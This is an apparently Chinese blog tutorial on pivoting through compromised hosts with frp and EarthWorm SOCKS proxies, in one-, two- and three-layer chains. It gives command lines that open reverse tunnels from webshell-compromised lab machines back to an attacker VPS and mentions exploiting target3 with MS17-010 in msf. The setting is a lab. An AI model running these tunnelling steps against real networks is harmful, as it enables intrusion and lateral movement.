Socks代理实战·2
/04 Socks代理实战-frp
首先你要有个VPS(frps服务器)
准备好穿透工具frp
先这样,后那些,再这样,最后在那样 —— 懂了么,怎么听不懂呢,再说一遍。先这样,后那样,再这样,最后在那样懂了吧。怎么还是不懂。
说细点
一,VPS
准备好frp包
在vps上解压,并创建一个配置文件frps_vps.ini,文件名其实随意,主要是配置信息一致。
1 |
vim frps_vps.ini |
二,Target1
当我们拿到一个网站的shell并用yijian连接后上传frpc和配置文件(配置文件自己写也可以):
检查配置信息启动frp客户端:
这时候vps服务器会接收到数据,还要注意,被控制方可以访问到我们的VPS。
配置文件解释:
common:
server_addr为VPS的IP,
server_port为VPS bind_port配置的端口,
socks5:
type传输类型
remote_port传输端口
plugin代理类型
Proxychains
配置信息注意Ip为VPSip,端口为target转交的端口
三,Target2
然后再通过代理拿到target2的webshell,yijian连接
然后老套路上传frpc和配置信息
但是Target2处于内网,访问不到我们的VPS那怎么办呢,只能能Target1作为frps了
上传Target1的frps和配置文件
配置文件信息:
启动服务:
target2的配置信息:
跟VPS到Target1的配置几乎一样,将本机的流量传输给frps服务器192.168.22.128的10089端口
Tips:192.168.1.128也是Target1的一个网卡但是Target2并不能传到所以要为192.168.22.128同网段的
重要配置现在Target2已经挂载代理到Target1了但是,我们攻击机并不能访问,流量并没有通向我们这,所以要修改一下target1的frpc的配置要将192.168.22.129的流量经过自己10089转交到VPS的10090端口配置信息如下:
比一层代理多了一端转发将本机1089端口转发到VPS的10090端口
配置好重新运行即可
修改proxychains的代理端口为10090
然后通过VPS探测33.33主机的信息
Tip:socks代理也可以设置身份验证来达到自己建立的通道不被他人盗用,需要在客户端通道信息下面添加plugin_usename和plugin_password的字段。
frp代理限于环境原因经常意外中断需要重新启动检查时建议使用,ps命令和netsat -anlp来回检查使用。
/05 EW
前置:
一,EW的一层代理
VPS192.168.1.129:
1 |
./ew -s rcsocks -l 1888 -e 7788 |
target1:192.168.1.128|192.168.22.128
1 |
./ew -s rssocks -d 192.168.1.129 -e 7788 |
proxychains配置:
使用proxychains访问内网target2(192.168.22.129)
二,EW二层代理
注意建立好一层才能访问到Target2哦才能建立代理二层哦,建立好二层一层就可以终止了
VPS192.168.1.129:
1 |
./ew_for_linux64 -s lcx_listen -l 10088 -e 8888 |
Target2,192.168.22.129:
1 |
./ew_for_linux64 -s ssocksd -l 9999 |
Target1,192.168.1.128||192.168.22.128:
1 |
./ew_for_linux64 -s lcx_slave -d 192.168.1.129 -e 8888 -f 192.168.22.129 -g 9999 |
VPS的socks代理成功提示:
proxuchains nmap验证:
使用msf拿到target3的shell通过信息收集知道target3存在ms017_010_psexec
拿到了shell上传ew
四,EW建立三层代理
VPS192.168.1.129:
1 |
./ew_for_linux64 -s rcsocks -l 10090 -e 6666 |
Target2,192.168.22.129|192.168.33.128:
1 |
./ew_for_linux64 -s lcx_listen -l 7778 -e 7777 |
Target3,192.168.33.33:
1 |
./ew_for_linux64 -s rssocks -d 192.168.33.128 -e 7777 |
Target1,192.168.1.128|192.168.22.128:
1 |
./ew_for_linux64 -d 192.168.1.128 -e 6666 -f 192.168.22.129 -g 7778 |
由底层到VPS的转发过程:
Target3,192.168.33.33:将流量转发至192.168.33.128:7777
1 |
./ew_for_linux64 -s rssocks -d 192.168.33.128 -e 7777 |
Target2,192.168.22.129|192.168.33.128:将本地7777的流量转发至7778
1 |
./ew_for_linux64 -s lcx_listen -l 7778 -e 7777 |
Target1,192.168.1.128|192.168.22.128:将Target2(192.168.22.128)7778转义到VPS的6666端口
1 |
./ew_for_linux64 -d 192.168.1.129 -e 6666 -f 192.168.22.128 -g 7778 |
VPS192.168.1.129:
1 |
./ew_for_linux64 -s rcsocks -l 10090 -e 6666 |
将VPS的6666端口转发至10090用户建立代理VPSIP+10090端口即可访问到三层代理,
只提供重VPS到Target3的流量并不能访问Target1,2哦,但是一般穿透内网都是一层一层打下来所以一定拿到了target1,2的shell和一二层的代理,注意端口别重复使用哦。
建立代理提前搭建流量流通模型更方便理解思考
FROM :https://ailumao.cn/ | Author:Ailumao
相关推荐: HITCON 2015 lalala(SSRF)
题目连接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_3/index.php 一个文件上传题,尝试上传个图片,结果: 好吧,环境没搭好,这不能怪我了,我只能看源码来搭了。 但…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论